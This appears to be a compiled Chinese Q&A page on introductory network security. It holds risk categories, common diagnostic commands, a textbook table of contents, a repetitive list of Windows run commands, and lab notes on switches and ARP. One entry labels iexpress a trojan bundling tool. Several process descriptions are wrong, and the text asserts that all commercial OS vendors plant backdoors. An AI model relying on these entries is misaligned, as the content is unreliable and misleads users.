物理安全
網路的物理安全是整個網路系統安全的前提。在校園網工程建設中,由於網路系統屬於弱電工程,耐壓值很低。因此,在網路工程的設計和施工中,必須優先考慮保護人和網路設備不受電、火災和雷擊的侵害;考慮布線系統與照明電線、動力電線、通信線路、暖氣管道及冷熱空氣管道之間的距離;考慮布線系統和絕緣線、裸體線以及接地與焊接的安全;必須建設防雷系統,防雷系統不僅考慮建築物防雷,還必須考慮計算機及其他弱電耐壓設備的防雷。總體來說物理安全的風險主要有,地震、水災、火災等環境事故;電源故障;人為操作失誤或錯誤;設備被盜、被毀;電磁干擾;線路截獲;高可用性的硬體;雙機多冗餘的設計;機房環境及報警系統、安全意識等,因此要注意這些安全隱患,同時還要盡量避免網路的物理安全風險。
網路結構
網路拓撲結構設計也直接影響到網路系統的安全性。假如在外部和內部網路進行通信時,內部網路的機器安全就會受到威脅,同時也影響在同一網路上的許多其他系統。透過網路傳播,還會影響到連上Internet/Intranet的其他的網路;影響所及,還可能涉及法律、金融等安全敏感領域。因此,我們在設計時有必要將公開伺服器(WEB、DNS、EMAIL等)和外網及內部其它業務網路進行必要的隔離,避免網路結構信息外泄;同時還要對外網的服務請求加以過濾,只允許正常通信的數據包到達相應主機,其它的請求服務在到達主機之前就應該遭到拒絕。
系統的安全
所謂系統的安全是指整個網路操作系統和網路硬體平台是否可靠且值得信任。恐怕沒有絕對安全的操作系統可以選擇,無論是Microsoft 的Windows NT或者其它任何商用UNIX操作系統,其開發廠商必然有其Back-Door。因此,我們可以得出如下結論:沒有完全安全的操作系統。不同的用戶應從不同的方面對其網路作詳盡的分析,選擇安全性盡可能高的操作系統。因此不但要選用盡可能可靠的操作系統和硬體平台,並對操作系統進行安全配置。而且,必須加強登錄過程的認證(特別是在到達伺服器主機之前的認證),確保用戶的合法性;其次應該嚴格限制登錄者的操作許可權,將其完成的操作限制在最小的范圍內。
應用系統
應用系統的安全跟具體的應用有關,它涉及面廣。應用系統的安全是動態的、不斷變化的。應用的安全性也涉及到信息的安全性,它包括很多方面。
——應用系統的安全是動態的、不斷變化的。
應用的安全涉及方面很多,以Internet上應用最為廣泛的E-mail系統來說,其解決方案有sendmail、Netscape Messaging Server、SoftwareCom Post.Office、Lotus Notes、Exchange Server、SUN CIMS等不下二十多種。其安全手段涉及LDAP、DES、RSA等各種方式。應用系統是不斷發展且應用類型是不斷增加的。在應用系統的安全性上,主要考慮盡可能建立安全的系統平台,而且通過專業的安全工具不斷發現漏洞,修補漏洞,提高系統的安全性。
應用的安全性涉及到信息、數據的安全性。
信息的安全性涉及到機密信息泄露、未經授權的訪問、 破壞信息完整性、假冒、破壞系統的可用性等。在某些網路系統中,涉及到很多機密信息,如果一些重要信息遭到竊取或破壞,它的經濟、社會影響和政治影響將是很嚴重的。因此,對用戶使用計算機必須進行身份認證,對於重要信息的通訊必須授權,傳輸必須加密。採用多層次的訪問控制與許可權控制手段,實現對數據的安全保護;採用加密技術,保證網上傳輸的信息(包括管理員口令與帳戶、上傳信息等)的機密性與完整性。
管理風險
管理是網路中安全最最重要的部分。責權不明,安全管理制度不健全及缺乏可操作性等都可能引起管理安全的風險。當網路出現攻擊行為或網路受到其它一些安全威脅時(如內部人員的違規操作等),無法進行實時的檢測、監控、報告與預警。同時,當事故發生後,也無法提供黑客攻擊行為的追蹤線索及破案依據,即缺乏對網路的可控性與可審查性。這就要求我們必須對站點的訪問活動進行多層次的記錄,及時發現非法入侵行為。
建立全新網路安全機制,必須深刻理解網路並能提供直接的解決方案,因此,最可行的做法是制定健全的管理制度和嚴格管理相結合。保障網路的安全運行,使其成為一個具有良好的安全性、可擴充性和易管理性的信息網路便成為了首要任務。一旦上述的安全隱患成為事實,所造成的對整個網路的損失都是難以估計的
B. 哪些命令是區域網管理常用安全命令
1. ipconfig命令
主要功能:顯示本地主機IP地址、子網掩碼、默認網關、MAC地址等。
C:> ipconfig/all。
2.ping命令
主要功能:目標主機的可達性、名稱、IP地址、路由跳數、往返時間等。
C:>ping 192.168.0.1 or target_name。
3. tracert命令
主要功能:路由跟蹤、節點IP地址、節點時延、域名信息等。
C:>tracert。
4. netstat命令
主要功能:顯示協議統計信息和當前TCP/IP網路連接。
C:>netstat–a;C:>netstat–n。
5. arp命令
主要功能:arp即地址解析協議,在常用乙太網或令牌LAN上,用於實現第三層到第二層地址的轉換IP à MAC,顯示和修改IP地址與MAC地址的之間映射。
C:>arp –a。
C. 計算機網路安全學習內容有哪些
涉及的內容:
第1章 計算機網路安全概述 1
1.1 計算機網路安全的基本概念 1
1.1.1 網路安全的定義 1
1.1.2 網路安全的特性 2
1.2 計算機網路安全的威脅 3
1.2.1 網路安全威脅的分類 3
1.2.2 計算機病毒的威脅 3
1.2.3 木馬程序的威脅 4
1.2.4 網路監聽 4
1.2.5 黑客攻擊 4
1.2.6 惡意程序攻擊 4
1.3 網路安全威脅產生的根源 5
1.3.1 系統及程序漏洞 5
1.3.2 網路安全防護所需設施
存在的問題 8
1.3.3 安全防護知識方面存在的問題 9
1.4 網路安全策略 9
1.4.1 網路安全策略設計的原則 9
1.4.2 幾種網路安全策略 10
1.5 計算機網路安全的現狀與發展 11
1.5.1 計算機網路安全的現狀 11
1.5.2 計算機網路安全的發展方向 12
1.6 小結與練習 13
1.6.1 小結 13
1.6.2 練習 13
第2章 網路安全體系結構及協議 14
2.1 計算機網路協議概述 14
2.1.1 網路協議 14
2.1.2 協議簇和行業標准 14
2.1.3 協議的交互 15
2.1.4 技術無關協議 15
2.2 OSI參考模型及其安全體系 16
2.2.1 計算機網路體系結構 16
2.2.2 OSI參考模型簡介 16
2.2.3 ISO/OSI安全體系 17
2.3 TCP/IP參考模型及其安全體系 20
2.3.1 TCP/IP參考模型 20
2.3.2 TCP/IP參考模型的安全體系 21
2.4 常用網路協議和服務 24
2.4.1 常用網路協議 24
2.4.2 常用網路服務 27
2.5 Windows常用的網路命令 28
2.5.1 ping命令 28
2.5.2 at命令 30
2.5.3 netstat命令 31
2.5.4 tracert命令 32
2.5.5 net命令 32
2.5.6 ftp命令 34
2.5.7 nbtstat命令 35
2.5.8 telnet命令 36
2.6 協議分析工具-Sniffer的應用 36
2.6.1 Sniffer的啟動和設置 37
2.6.2 解碼分析 40
2.7 實訓項目 42
2.8 小結與練習 43
2.8.1 小結 43
2.8.2 練習 43
第3章 計算機病毒與木馬 44
3.1 計算機病毒概述 44
3.1.1 計算機病毒的定義 44
3.1.2 計算機病毒的演變史 44
3.1.3 計算機病毒的特性 46
3.2 計算機病毒及其分類、
傳播途徑 46
3.2.1 常見計算機病毒 46
3.2.2 計算機病毒的分類 47
3.2.3 計算機病毒的傳播途徑 48
3.3 計算機病毒的檢測和防禦 49
3.3.1 普通計算機病毒的檢測與防禦 49
3.3.2 U盤病毒的檢測與防禦 54
3.3.3 ARP病毒的檢測與防禦 57
3.3.4 蠕蟲病毒的檢測與防禦 59
3.4 計算機木馬概述 64
3.4.1 計算機木馬的定義 65
3.4.2 計算機木馬的類型及基本功能 65
3.4.3 計算機木馬的工作原理 66
3.5 計算機木馬的檢測與防禦 66
3.5.1 普通計算機木馬的檢測與防禦 66
3.5.2 典型計算機木馬的手動清除 70
3.6 實訓項目 74
3.7 小結與練習 74
3.7.1 小結 74
3.7.2 練習 75
第4章 加密與數字簽名 76
4.1 加密技術 76
4.1.1 加密技術概述 76
4.1.2 數據加密常見方式 77
4.2 加密演算法 80
4.2.1 古典加密演算法 80
4.2.2 現代加密演算法 82
4.3 數字簽名技術 84
4.3.1 數字簽名技術概述 84
4.3.2 數字簽名技術的工作原理 85
4.3.3 數字簽名技術的演算法 86
4.4 PKI技術 86
4.4.1 PKI概述 86
4.4.2 PKI技術原理 86
4.4.3 證書頒發機構 87
4.4.4 數字證書 88
4.5 PGP原理及應用 89
4.5.1 PGP概述 89
4.5.2 PGP密鑰的創建 89
4.5.3 PGP文件加密和解密 93
4.5.4 PGP密鑰導出與導入 94
4.5.5 PGP電子郵件加、解密和
簽名驗證 95
4.5.6 PGP數字簽名 97
4.6 EFS原理及應用 98
4.6.1 EFS概述 98
4.6.2 EFS的加密和解密 98
4.6.3 EFS的其他應用 101
4.7 SSL安全傳輸及應用 104
4.7.1 SSL概述 104
4.7.2 SSL的工作原理 105
4.7.3 安裝證書服務 105
4.7.4 申請證書 107
4.7.5 頒發Web伺服器證書 110
4.7.6 安裝伺服器證書 111
4.7.7 Web伺服器的SSL設置 112
4.7.8 瀏覽器的SSL設置 113
4.7.9 訪問SSL站點 115
4.8 實訓項目 115
4.9 小結與練習 118
4.9.1 小結 118
4.9.2 練習 118
第5章 防火牆技術 119
5.1 防火牆概述 119
5.1.1 防火牆的基本准則 119
5.1.2 防火牆的主要功能特性 120
5.1.3 防火牆的局限性 120
5.2 防火牆的實現技術 120
5.2.1 數據包過濾 120
5.2.2 應用層代理 121
5.2.3 狀態檢測技術 122
5.3 防火牆的體系結構 122
5.3.1 雙宿/多宿主機模式 122
5.3.2 屏蔽主機模式 123
5.3.3 屏蔽子網模式 123
5.4 防火牆的工作模式 124
5.5 防火牆的實施方式 126
5.5.1 基於單個主機的防火牆 126
5.5.2 基於網路主機的防火牆 126
5.5.3 硬體防火牆 126
5.6 瑞星個人防火牆的應用 127
5.6.1 界面與功能布局 127
5.6.2 常用功能 128
5.6.3 網路監控 130
5.6.4 訪問控制 134
5.6.5 高級設置 137
5.7 ISA Server 2004配置 138
5.7.1 ISA Server 2004概述 138
5.7.2 ISA Server 2004的安裝 139
5.7.3 ISA Server 2004防火牆策略 142
5.7.4 發布內部網路中的伺服器 147
5.7.5 ISA Server 2004的系統和
網路監控及報告 152
5.8 iptables防火牆 155
5.8.1 iptables中的規則表 156
5.8.2 iptables命令簡介 156
5.8.3 Linux防火牆配置 158
5.9 PIX防火牆配置 161
5.9.1 PIX的基本配置命令 162
5.9.2 PIX防火牆配置實例 166
5.10 實訓項目 167
5.11 小結與練習 170
5.11.1 小結 170
5.11.2 練習 170
第6章 Windows Server 2003的
網路安全 171
6.1 Windows Server 2003的
安全簡介 171
6.1.1 用戶身份驗證 171
6.1.2 基於對象的訪問控制 172
6.2 Windows Server 2003系統安全
配置的常用方法 172
6.2.1 安裝過程 172
6.2.2 正確設置和管理賬戶 172
6.2.3 正確設置目錄和文件許可權 173
6.2.4 網路服務安全管理 173
6.2.5 關閉無用埠 174
6.2.6 本地安全策略 175
6.2.7 審核策略 179
6.2.8 Windows日誌文件的保護 180
6.3 Windows Server 2003訪問
控制技術 181
6.3.1 訪問控制技術簡介 181
6.3.2 Windows Server 2003訪問
控制的使用 181
6.4 賬戶策略 187
6.4.1 賬戶策略的配置 187
6.4.2 Kerberos策略 190
6.5 啟用安全模板 190
6.5.1 安全模板的簡介 190
6.5.2 啟用安全模板的方法 191
6.6 實訓項目 193
6.7 小結與練習 196
6.7.1 小結 196
6.7.2 練習 196
第7章 埠掃描技術 197
7.1 埠概述 197
7.1.1 TCP/IP工作原理 197
7.1.2 埠的定義 199
7.1.3 埠的分類 199
7.2 埠掃描技術 200
7.2.1 埠掃描概述 200
7.2.2 常見的埠掃描技術 201
7.3 常見掃描軟體及其應用 202
7.3.1 掃描軟體概述 202
7.3.2 SuperScan掃描工具及應用 202
7.4 埠掃描防禦技術應用 204
7.4.1 查看埠的狀態 204
7.4.2 關閉閑置和危險的埠 207
7.4.3 隱藏操作系統類型 209
7.5 實訓項目 211
7.6 小結與練習 215
7.6.1 小結 215
7.6.2 練習 215
第8章 入侵檢測系統 216
8.1 入侵檢測概述 216
8.1.1 入侵檢測的概念及功能 216
8.1.2 入侵檢測系統模型 216
8.1.3 入侵檢測工作過程 217
8.2 入侵檢測系統的分類 217
8.2.1 根據檢測對象劃分 217
8.2.2 根據檢測技術劃分 218
8.2.3 根據工作方式劃分 219
8.3 入侵檢測系統部署 219
8.3.1 基於主機的入侵
檢測系統部署 219
8.3.2 基於網路的入侵
檢測系統部署 219
8.3.3 常見入侵檢測工具及其應用 221
8.4 入侵防護系統 225
8.4.1 入侵防護系統的工作原理 226
8.4.2 入侵防護系統的優點 227
8.4.3 入侵防護系統的主要應用 228
8.5 小結與練習 228
8.5.1 小結 228
8.5.2 練習 229
第9章 無線網路安全 230
9.1 無線區域網介紹 230
9.1.1 無線區域網常用術語 230
9.1.2 無線區域網組件 231
9.1.3 無線區域網的訪問模式 232
9.1.4 覆蓋區域 233
9.2 無線網路常用標准 233
9.2.1 IEEE 802.11b 234
9.2.2 IEEE 802.11a 234
9.2.3 IEEE 802.11g 235
9.2.4 IEEE 802.11n 235
9.3 無線網路安全解決方案 236
9.3.1 無線網路訪問原理 236
9.3.2 認證 237
9.3.3 加密 238
9.3.4 入侵檢測系統 240
9.4 小結與練習 241
9.4.1 小結 241
D. 十個常見網路命令
全是摘抄的,如有原作者,請把分給他們.
1. gpedit.msc-----組策略
3. Nslookup-------IP地址偵測器
4. explorer-------打開資源管理器
5. logoff---------注銷命令
6. tsshutdn-------60秒倒計時關機命令
7. lusrmgr.msc----本機用戶和組
8. services.msc---
9. oobe/msoobe /a----檢查XP是否激活
10. notepad--------打開記事本
11. cleanmgr-------垃圾整理
12. net start messenger----開始信使服務
13. compmgmt.msc---計算機管理
14. net stop messenger-----停止信使服務
15. conf-----------啟動netmeeting
16. dvdplay--------DVD播放器
17. charmap--------啟動字元映射表
18. diskmgmt.msc---磁碟管理實用程序
19. calc-----------啟動計算器
20. dfrg.msc-------磁碟碎片整理程序
21. chkdsk.exe-----Chkdsk磁碟檢查
22. devmgmt.msc--- 設備管理器
23. regsvr32 /u *.dll----停止dll文件運行
24. drwtsn32------ 系統醫生
25. rononce -p ----15秒關機
26. dxdiag---------檢查DirectX信息
28. Msconfig.exe---系統配置實用程序
30. mem.exe--------顯示內存使用情況
31. regedit.exe----注冊表
32. winchat--------XP自帶區域網聊天
33. progman--------程序管理器
34. winmsd---------系統信息
35. perfmon.msc----計算機性能監測程序
36. winver---------檢查Windows版本
37. sfc /scannow-----掃描錯誤並復原
38. taskmgr-----任務管理器(2000/xp/2003
39. winver---------檢查Windows版本
40. wmimgmt.msc----打開windows管理體系結構(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows腳本宿主設置
43. write----------寫字板
44. winmsd---------系統信息
45. wiaacmgr-------掃描儀和照相機向導
46. winchat--------XP自帶區域網聊天
47. mem.exe--------顯示內存使用情況
48. Msconfig.exe---系統配置實用程序
49. mplayer2-------簡易widnows media player
50. mspaint--------畫圖板
51. mstsc----------遠程桌面連接
52. mplayer2-------媒體播放機
53. magnify--------放大鏡實用程序
54. mmc------------打開控制台
55. mobsync--------同步命令
56. dxdiag---------檢查DirectX信息
57. drwtsn32------ 系統醫生
58. devmgmt.msc--- 設備管理器
59. dfrg.msc-------磁碟碎片整理程序
60. diskmgmt.msc---磁碟管理實用程序
61. dcomcnfg-------打開系統組件服務
62. ddeshare-------打開DDE共享設置
64. net stop messenger-----停止信使服務
65. net start messenger----開始信使服務
66. notepad--------打開記事本
67. nslookup-------網路管理的工具向導
68. ntbackup-------系統備份和還原
69. narrator-------屏幕「講述人」
70. ntmsmgr.msc----移動存儲管理器
71. ntmsoprq.msc---移動存儲管理員操作請求
72. netstat -an----(TC)命令檢查介面
73. syncapp--------創建一個公文包
74. sysedit--------系統配置編輯器
75. sigverif-------文件簽名驗證程序
76. sndrec32-------錄音機
77. shrpubw--------創建共享文件夾
78. secpol.msc-----本地安全策略
79. syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
80. services.msc---本地服務設置
81. Sndvol32-------音量控製程序
82. sfc.exe--------系統文件檢查器
83. sfc /scannow---windows文件保護
85. tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
86. taskmgr--------任務管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. explorer-------打開資源管理器
90. packager-------對象包裝程序
91. perfmon.msc----計算機性能監測程序
92. progman--------程序管理器
93. regedit.exe----注冊表
94. rsop.msc-------組策略結果集
95. regedt32-------注冊表編輯器
97. regsvr32 /u *.dll----停止dll文件運行
98. regsvr32 /u zipfldr.dll------取消ZIP支持
99. cmd.exe--------CMD命令提示符
100. chkdsk.exe-----Chkdsk磁碟檢查
101. certmgr.msc----證書管理實用程序
102. calc-----------啟動計算器
103. charmap--------啟動字元映射表
104. cliconfg-------SQL SERVER 客戶端網路實用程序
105. Clipbrd--------剪貼板查看器
106. conf-----------啟動netmeeting
107. compmgmt.msc---計算機管理
108. cleanmgr-------垃圾整理
109. ciadv.msc------索引服務程序
110. osk------------打開屏幕鍵盤
111. odbcad32-------ODBC數據源管理器
112. oobe/msoobe /a----檢查XP是否激活
113. lusrmgr.msc----本機用戶和組
114. logoff---------注銷命令
115. iexpress-------木馬捆綁工具,系統自帶
116. Nslookup-------IP地址偵測器
117. fsmgmt.msc-----共享文件夾管理器
118. utilman--------輔助工具管理器
winver---------檢查windows版本
wmimgmt.msc----打開windows管理體系結構(wmi)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板
winmsd---------系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------xp自帶區域網聊天
mem.exe--------顯示內存使用情況
msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令
--------------------------------------------------------------------------------
dxdiag---------檢查directx信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
diskmgmt.msc---磁碟管理實用程序
dcomcnfg-------打開系統組件服務
ddeshare-------打開dde共享設置
dvdplay--------dvd播放器
--------------------------------------------------------------------------------
net stop messenger-----停止信使服務
net start messenger----開始信使服務
notepad--------打開記事本
nslookup-------網路管理的工具向導
ntbackup-------系統備份和還原
narrator-------屏幕「講述人」
ntmsmgr.msc----移動存儲管理器
ntmsoprq.msc---移動存儲管理員操作請求
netstat -an----(tc)命令檢查介面
--------------------------------------------------------------------------------
syncapp--------創建一個公文包
sysedit--------系統配置編輯器
sigverif-------文件簽名驗證程序
sndrec32-------錄音機
shrpubw--------創建共享文件夾
secpol.msc-----本地安全策略
syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
services.msc---本地服務設置
sndvol32-------音量控製程序
sfc.exe--------系統文件檢查器
sfc /scannow---windows文件保護
--------------------------------------------------------------------------------
tsshutdn-------60秒倒計時關機命令
tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr--------任務管理器
--------------------------------------------------------------------------------
eventvwr-------事件查看器
eudcedit-------造字程序
explorer-------打開資源管理器
--------------------------------------------------------------------------------
packager-------對象包裝程序
perfmon.msc----計算機性能監測程序
progman--------程序管理器
--------------------------------------------------------------------------------
regedit.exe----注冊表
rsop.msc-------組策略結果集
regedt32-------注冊表編輯器
rononce -p ----15秒關機
regsvr32 /u *.dll----停止dll文件運行
regsvr32 /u zipfldr.dll------取消zip支持
--------------------------------------------------------------------------------
cmd.exe--------cmd命令提示符
chkdsk.exe-----chkdsk磁碟檢查
certmgr.msc----證書管理實用程序
calc-----------啟動計算器
charmap--------啟動字元映射表
cliconfg-------sql server 客戶端網路實用程序
clipbrd--------剪貼板查看器
conf-----------啟動netmeeting
compmgmt.msc---計算機管理
cleanmgr-------垃圾整理
ciadv.msc------索引服務程序
--------------------------------------------------------------------------------
osk------------打開屏幕鍵盤
odbcad32-------odbc數據源管理器
oobe/msoobe /a----檢查xp是否激活
lusrmgr.msc----本機用戶和組
logoff---------注銷命令
--------------------------------------------------------------------------------
iexpress-------木馬捆綁工具,系統自帶
--------------------------------------------------------------------------------
nslookup-------ip地址偵測器
--------------------------------------------------------------------------------
fsmgmt.msc-----共享文件夾管理器
--------------------------------------------------------------------------------
utilman--------輔助工具管理器
--------------------------------------------------------------------------------
gpedit.msc-----組策略
回答者:ayiyayia - 秀才 二級 1-12 08:46
smss.exeSessionManager
csrss.exe 子系統伺服器進程
winlogon.exe管理用戶登錄
services.exe包含很多系統服務
lsass.exe 管理 IP 安全策略以及啟動 ISAKMP/Oakley (IKE) 和 IP 安全驅動程序。
svchost.exe Windows 2000/XP 的文件保護系統
SPOOLSV.EXE 將文件載入到內存中以便遲後列印。)
explorer.exe資源管理器
internat.exe托盤區的拼音圖標)
mstask.exe允許程序在指定時間運行。
regsvc.exe允許遠程注冊表操作。(系統服務)->remoteregister
winmgmt.exe 提供系統管理信息(系統服務)。
inetinfo.exemsftpsvc,w3svc,iisadmn
tlntsvr.exe tlnrsvr
tftpd.exe 實現 TFTP Internet 標准。該標准不要求用戶名和密碼。
termsrv.exe termservice
dns.exe 應答對域名系統(DNS)名稱的查詢和更新請求。
tcpsvcs.exe 提供在 PXE 可遠程啟動客戶計算機上遠程安裝 Windows 2000 Professional 的能力。
ismserv.exe 允許在 Windows Advanced Server 站點間發送和接收消息。
ups.exe 管理連接到計算機的不間斷電源(UPS)。
wins.exe為注冊和解析 NetBIOS 型名稱的 TCP/IP 客戶提供 NetBIOS 名稱服務。
llssrv.exe證書記錄服務
ntfrs.exe 在多個伺服器間維護文件目錄內容的文件同步。
RsSub.exe 控制用來遠程儲存數據的媒體。
locator.exe 管理 RPC 名稱服務資料庫。
lserver.exe 注冊客戶端許可證。
dfssvc.exe管理分布於區域網或廣域網的邏輯卷。
clipsrv.exe 支持「剪貼簿查看器」,以便可以從遠程剪貼簿查閱剪貼頁面。
msdtc.exe 並列事務,是分布於兩個以上的資料庫,消息隊列,文件系統或其它事務保護護資源管理器。
faxsvc.exe幫助您發送和接收傳真。
cisvc.exe 索引服務
dmadmin.exe 磁碟管理請求的系統管理服務。
mnmsrvc.exe 允許有許可權的用戶使用 NetMeeting 遠程訪問 Windows 桌面。
netdde.exe提供動態數據交換 (DDE) 的網路傳輸和安全特性。
smlogsvc.exe配置性能日誌和警報。
rsvp.exe為依賴質量服務(QoS)的程序和控制應用程序提供網路信號和本地通信控制安裝功功能。
RsEng.exe 協調用來儲存不常用數據的服務和管理工具。
RsFsa.exe 管理遠程儲存的文件的操作。
grovel.exe掃描零備份存儲(SIS)卷上的重復文件,並且將重復文件指向一個數據存儲點,以節省磁碟空間(只對 NTFS 文件系統有用)。
SCardSvr.ex 對插入在計算機智能卡閱讀器中的智能卡進行管理和訪問控制。
snmp.exe包含代理程序可以監視網路設備的活動並且向網路控制台工作站匯報。
snmptrap.exe接收由本地或遠程 SNMP 代理程序產生的陷阱(trap)消息,然後將消息傳遞到運行在這台計算機上 SNMP 管理程序。
UtilMan.exe 從一個窗口中啟動和配置輔助工具。
msiexec.exe依據 .MSI 文件中包含的命令來安裝、修復以及刪除軟體。
COMMAND:進入DOS模式
REGEDIT:打開注冊表
MSCONFIG:系統配置實用程序
E. 網路安全容易學么
給你個文件就知道了。
實驗一 交換機功能及配置
一、 交換機的聯接
1、 使用普通埠聯接(不可取,嚴重影響網速)
有一個48口交換機,普通埠100Mbps,兩個高速埠,為1000Mbps,背板帶寬為:
(48*100+2*1000)*2Mbps=13.2Gbps --à13.2Gbps
2、級聯
3、堆疊(最優聯接方法)
二、交換機的性能指標:
1、 支持的MAC地址數目
2、 背板帶寬
3、 包轉發率
4、 支持的協議
SNMP(簡單網路管理協議),IEEE802.11(無線),IEEE802.1q(VLAN)
三、交換機配置的幾種模式:
1. 用戶模式(switch>)
2.特權模式(switch#) switch>enable (ena)
3.全局配置模式( (config)#) switch#config terminal (config t)
(1)介面配置模式 (config)#interface fa 0/1
啟用介面:no shutdown 使能
(2)線路配置模式(config)#line vty 10 00-15
Exit end
Ip address
三、交換機的初始配置及console埠配置:
1.帶外管理
適用范圍:
聯線方法:
使用:超級終端
Usb-à串口
2. 帶內管理
聯線方法:
三種方法登錄。(telnet、http、廠家專用網管軟體)
3.交換機的初始配置
Switch>ena
Switch#Setup(更改交換名字、三個密碼、vlan1的IP地址、保存返回)
帶外管理配置交換機
流程:
結束
共享式乙太網特徵::中心結點是集線器這是共享式乙太網。(物理上是星狀,邏輯上是匯流排拓撲結構),每一結點共享帶寬。
交換式乙太網特徵:(中心結點是交換機)
交換機帶寬為30Mbps,每一個結點的帶寬為:30Mbps
1、獨享帶寬
2、能夠為多對結點同時建立並發聯接
3、並行性
註:集線器收到數據幀一定會向所有埠轉發。(因為集線器工作物理層,相當於一條線)
交換機在以下兩種情況下會向所有埠轉發數據幀:
1、 目標地址為全1時(廣播地址)
2、 埠-MAC地址映射表還沒有內容時。(即查不到目的MAC地址時)。
PDU:是指協議數據單元。
ARP:地址解析協議,實現從IP地址到MAC地址的映射。 IP--àMAC
查看計算機中的ARP緩存: Arp -a
刪除計算機中的ARP緩存:arp -d
查看路由路的ARP解析緩存 Show arp
查看路由路的IP路由 Show ip route
查看路由路的介面配置 Show int
查看交換機的埠-MAC地址映射表:Show mac-address-table
刪除交換機的埠-MAC地址映射表:Clea mac-address-table
1、交換機的地址學習功能和轉發/過濾決策
埠-MAC地址映射表
設備名
MAC地址
埠號
PC0
00e006123456
Fa0/1
內存(ram)
PC0向交換機發送了一個 幀 :包含目標MAC地址、源MAC地址
掌握兩類幀:
假設主機PC1去ping主機pc1,使用的PDU是icmp格式的幀,由於PC1第一次與PC2通信,還不知道PC2的MAC地址,無法組裝ICMP幀。(此時模擬器中的紫色幀無法發出,查看這個ICMP幀發現,沒有源MAC地址)
為了獲得PC2的MAC地址,PC1發出了一個ARP請求(綠色的幀,查看幀結構發現,其目標MAC地址是全1,即向所有結點廣播,查詢192.168.1.2的MAC地址)
ARP幀到達交換機時,交換機學習到了PC1的信息,可以在交換機中用SHOW驗證。
交換機向所有結點查詢:192.168.1.2的MAC地址,PC2收到後回復交換機一個ARP幀,交換機學習到了PC2的信息。交換機向PC1回復一個ARP信息,PC1記下192.168.1.2對應的MAC地址在ARP緩存中。(可以用arp –a驗證)
問題關鍵:
1、 PC1、PC2中的各個幀中的目的MAC地址、源MAC地址(幀結構)。
2、 不同階段的PC1、PC2中的ARP緩存內容。
Arp –a arp -d
3、 不同階段的交換機中的埠-MAC地址映射表。
Show mac-address-table 查看埠-MAC地址映射表
Clea mac-address-table 清除埠-MAC地址映射表
2、地址學習與轉發/過濾決策
思考練習題:
1、 剛開機時,
PC1的ARP緩存內容:no
PC2的ARP緩存內容:no
交換機內容:no
2、 工作在模擬模式,pc1向pc2 發送ping, 當PC1發出的arp包到達交換機時,
交換機內容:
Arp幀的結構:
3、 當PC1發出的arp包到達pc2時,
PC2的ARP緩存內容:
回復Arp幀的結構:
4、 當PC2發出的回復ARP包到達交換機時
交換機內容:
回復Arp幀的結構:
5、 當回復的ARP包到達PC1時,
PC1的ARP緩存內容:
6、 當PC1發送的ICMP幀到達交換機時,
交換機這時候該干什麼?
7、 ICMP幀到達PC2時,
觀察進出PC2的兩個ICMP幀有什麼不同?
當PC2發出的回應ICMP幀經交換機到達PC1後,整個PING過程完成。
8、 實驗中,ARP幀起到了什麼作用?(提示:有兩個作用)。
9、 不使用ARP幀,直接由PC1向PC2發出ICMP幀可以嗎?
實驗二:三層交換實驗(單個路由器)
接入路由器:
1、支持slip(串列線路網際協議、用於普通modem撥號上網)協議
2、ppp協議(點對點協議)
路由器實驗:(三層交換實驗)
1、 搭建網路(如圖)
2、 配置
S0交換機網段為:192.168.1.0/24 網關為:192.168.1.254/24
S1交換機網段為:192.168.2.0/24 網關為:192.168.2.254/24
(注意:交換機初始配置中介面IP不能與各PC的IP地址重合)
Router1的fa0/0的IP為:192.168.1.254/24
(ip address 192.168.1.254 255.255.255.0)
No shutdown開啟埠
查看路由路IP show ip route
查看路由路埠 show int
查看路由路的ARP解析緩存 Show arp
Router1的fa0/1的IP為:192.168.2.254/24
No shutdown開啟埠
Write 保存
路由器直接相連的路徑,是直連路由,不需要配置,路由器自動識別。
3、 在模擬狀態下,pc1向pc1發送ping數據, 分析過程:
(過濾:只允許icmp和arp幀通過。)
實驗三:網路常用的檢測命令(八個命令)
一、 Ipconfig
1、 ipconfig 查看TCP/IP的基本配置。
(可以看到什麼?)
2、 ipconfig /all 查看TCP/IP的完整配置
DHCP:動態主機分配協議,DHCP伺服器為網路終端分配IP地址。
DNS:域名伺服器。網址(域名)與IP的映射
域名-----àip地址-----------àMAC地址
DNS(域名解析)arp(地址解析)
RARP(反向地址解析)
3、 ipconfig /renew 從dhcp伺服器重新獲取一個新的ip地址。
4、 ipconfig/release 釋放IP地址。
5、 ipconfig/flushdns 清理DNS解析緩存的內容
dns:域名伺服器。域名(網址)與IP的映射
6、ipconfig/displaydns 顯示DNS解析緩存的內容
二、ping命令
功能:向目標主機發送回送請求信息。
測試網路連通性
1、 回環測試
Ping 127.0.0.1
Ping localhost
本機的IP地址
2、 Ping網關
3、持續不斷發送回送請求信息
Ping -t www..com
檢測網路質量
4、-a 反向解析出IP地址或域名。
5、 -n 3
6、-l 300 icmp包的大小為300B 默認為32B
三、tracert (路由跟蹤)
跟蹤到達目的主機的路徑,即從本機到達目的主機經過了哪些網關(結點、路由器)。
-d 不將地址解析成主機名。加快顯示速度。
-h 搜索目標的最大躍點數。默認30
–w 等待每個回復的超時時間(以毫秒為單位)。
-j與主機列表一起的鬆散源路由(僅適用於 IPv4)。
路由器(wan口)、光modem、無線ap(無線網橋)
四、netstat
埠65536 80
-a 顯示所有活動連接信息及埠號 all active
-n 以數字形式顯示連接信息
-r 顯示本機路由信息。
-s 顯示每個協議的統計信息
-p tcp 顯示指定協議連接。
五、arp
arp攻擊 Ip到mac地址映射
處理(清除、建立)ARP解析緩存。
-d 刪除ARP解析緩存
-a 顯示ARP解析緩存
arp -s 157.55.85.212 00-aa-00-62-c6-09 添加靜態項。
區域網的組建:
1、線路及設備連接
傳輸介質、網卡
